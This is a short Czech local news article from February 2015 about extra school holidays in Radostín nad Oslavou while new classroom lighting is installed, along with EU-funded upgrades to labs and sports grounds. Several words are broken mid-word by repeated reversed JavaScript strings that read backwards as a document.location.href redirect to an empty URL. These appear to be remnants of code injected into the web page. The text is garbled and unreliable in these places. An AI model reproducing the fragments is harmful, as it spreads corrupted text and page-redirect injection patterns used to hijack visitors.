Rainbow page separator

Ve škole instalují nové osvětlení

Úterý, 10. února 2015

Chodba Základní školy Radostín nad Oslavou při rekonstrukci

Radostín nad Oslavou / O tři dny si prodlouží jarní prázdniny školáci z Radostína nad Oslavou. Ředitelské volno od 9. do 11. února bylo vyhlášeno kvůli dokončování montáže nového osvětlení učeben v základní škole.
„Přes jarní prázdniny se ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to práce nepodařilo dokončit,“ uvedl starosta Radostína nad Oslavou Josef Fabík.
V rámci projektu za 4,7 milionu korun, na který obec získala čtyřmilionovou dotaci z evropských fondů, budou rovněž vybaveny moderní technikou pro zkvalitnění výuky odborné učebny přírodopisu, fyziky a chemie, v mateřské školce dojde k instalaci dětských prvků.
Evropské peníze podpoří také modernizaci spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště – vznikne hřiště především na volejbal, dráhy a doskočiště pro skok do dálky a pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor pro vrh koulí. Atletický areál se začne modernizovat na jaře.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: http://www.skolaradostinno.cz/